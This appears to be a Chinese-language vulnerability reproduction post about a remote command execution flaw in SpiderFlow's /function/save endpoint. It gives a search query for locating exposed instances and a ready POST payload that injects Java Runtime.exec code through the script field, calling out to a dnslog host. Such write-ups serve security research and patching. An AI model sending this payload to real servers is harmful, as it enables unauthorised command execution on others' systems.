SpiderFlow save 远程命令执行漏洞

# SpiderFlow save 远程命令执行漏洞 ## 漏洞描述 SpiderFlow 平台以流程图的⽅式定义爬⾍,是⼀个⾼度灵活可配置的爬⾍平台 官⽹:https://www.spiderflow.org/ ## 漏洞影响 Sp...

SpiderFlow save 远程命令执行漏洞

漏洞描述

SpiderFlow 平台以流程图的⽅式定义爬⾍,是⼀个⾼度灵活可配置的爬⾍平台

官⽹:https://www.spiderflow.org/

漏洞影响

SpiderFlow

网络测绘

title=="SpiderFlow"

漏洞复现

主页面

img

发送请求包执行命令

POST /function/save

id=&name=cmd&parameter=yw&script=}Java.type('java.lang.Runtime').getRuntime().exec('ping chwd71.dnslog.cn');{

img

  • 发表于 2024-07-12 18:47:36
  • 阅读 ( 2162 )
  • 分类:Web应用

0 条评论

请先 登录 后评论
带头大哥
带头大哥

456 篇文章

站长统计